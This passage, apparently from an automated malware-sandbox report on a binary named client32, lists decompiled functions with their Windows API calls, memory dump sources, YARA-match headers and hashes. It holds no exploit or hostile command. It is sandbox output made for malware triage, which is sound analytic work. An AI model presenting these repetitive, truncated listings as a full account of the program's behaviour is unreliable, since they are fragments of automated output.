                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                • String ID: deque<T> too long
                                                                                • API String ID: 827257264-309773918
                                                                                • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                • _memmove.LIBCMT ref: 110193F7
                                                                                • _memmove.LIBCMT ref: 1101941B
                                                                                • _memmove.LIBCMT ref: 11019455
                                                                                • _memmove.LIBCMT ref: 11019471
                                                                                • std::exception::exception.LIBCMT ref: 110194BB
                                                                                • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                • String ID: deque<T> too long
                                                                                • API String ID: 827257264-309773918
                                                                                • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                                • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                                • MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
                                                                                • GetClientRect.USER32(?,?), ref: 11119508
                                                                                • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                                • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                                Strings
                                                                                • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                • API String ID: 4172599486-2052393828
                                                                                • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                  • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                • wsprintfA.USER32 ref: 1100977F
                                                                                • wsprintfA.USER32 ref: 11009799
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                • API String ID: 559337438-1872371932
                                                                                • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                • String ID: 8
                                                                                • API String ID: 762489935-4194326291
                                                                                • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                                • _memset.LIBCMT ref: 11005240
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2755257978-4108050209
                                                                                • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75730BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                • API String ID: 2999768849-588814233
                                                                                • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101D750
                                                                                • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                • _memset.LIBCMT ref: 1101D77A
                                                                                • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                • String ID: NSMChatSizeWnd
                                                                                • API String ID: 2883038198-4119039562
                                                                                • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                Function 11033470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97registryclipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 110334CA
                                                                                • _memset.LIBCMT ref: 11033501
                                                                                • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                • GetLastError.KERNEL32 ref: 11033534
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • _memmove.LIBCMT ref: 1103357E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
